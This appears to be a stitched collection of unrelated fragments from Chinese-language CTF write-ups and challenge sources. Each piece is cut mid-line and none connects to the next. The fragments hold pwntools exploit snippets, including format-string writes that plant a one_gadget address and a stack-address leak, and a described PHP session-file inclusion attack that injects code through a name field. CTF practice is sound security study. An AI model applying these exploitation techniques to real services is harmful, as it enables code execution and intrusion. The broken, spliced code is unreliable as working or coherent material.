sa(b'input your data ;)\n', b'%' + str((rbp + i) & 0xffff).encode() + b'c%28$hn\x00') sa(b'input your data ;)\n', b'%' + str((one_gadget >> i*8) & 0xff).encode() + b'c%41$hhn\x00') #rbp写成存onegadget sa(b'input your data ;)\n', b'%' + str(...
file=2.txt>my booklist</a></body></html> 到这里基本就可以确定是session文件包含,既然session内容可控,那就可以直接传入恶意代码,比如构造一个phpinfo(),也就是在please input your name下面的框写入一个<?php phpinfo();?>传进去,然后通过访问session的默认路径+sess_PHPSESSID就可以被执行了 session文件默...
io = process('./babygame') io.sendlineafter(b'Please input your name:', b'1234567890' * 26 + b'aaaaa') io.recvuntil(b'Hello, ') io.recv(260 + 12) stack_addr = u64(io.recv(6) + b'\x00\x00') srand = 0x30393837 answer = [1, 2, 2, 1, 1, 1, 1, 2, 0, 0, 2, ...
data:p.sendlineafter(text,str(data))r=lambdanum=4096:p.recv(num)ru=lambdatext:p.recvuntil(text)uu32=lambda:u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))uu64=lambda:u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))lg=lambdaname,data:...
p.recvuntil('[+]Please input your name:\n') p.sendline(payload) print(hex(len(payload))) p.interactive() NO.14 [BJDCTF 2nd]one_gadget _sovle exp #-*- coding:utf-8-*- from pwn import * from LibcSearcher import * context(os="linux", arch="amd64", log_level="debug") local ...
print('Please input your deer picture`s base64(Preferably in png format)') pic = input('>') try: pic = base64.b64decode(pic) except: exit() if b"<?php" in pic or b'eval' in pic: print("Hacker!!This is not WEB,It`s Just a misc!!!") ...
System.out.println("Please input the flag ); String str = s.next(); System.out.println("Your input is ); System.out.println(str); char[] stringArr = str.toCharArray(); Encrypt(stringArr); } public static void Encrypt(char[] arr) { ...
definit(name, addr): p.sendlineafter(b'Input your name:\n', name) p.sendlineafter(b'Input your address:\n', addr) defadd(size, content): p.sendlineafter(b'option--->>\n','1') p.sendlineafter(b'content:(less than 128)\n',str(size)) ...
p.sendafter("Input your description:",desc) deflogin(user_name:(str,bytes)): p.sendlineafter("Your choice:","1") p.sendafter("Please input your user name:",user_name) msg=p.recvline() info("Msg recv: {}".format(msg))
c ='29426dfee9b0f158983ad996b0b7a25e3fdf85c3df187b697e3b639c64f452f21c95a941542aa530199083baf296d805'k =input('Please input your key: ') flag = decrypt(k, c)if'flag'inflag:print('Wow, you find it!!!')else:print('Oh no!!!')if__name__ =='__main__': ...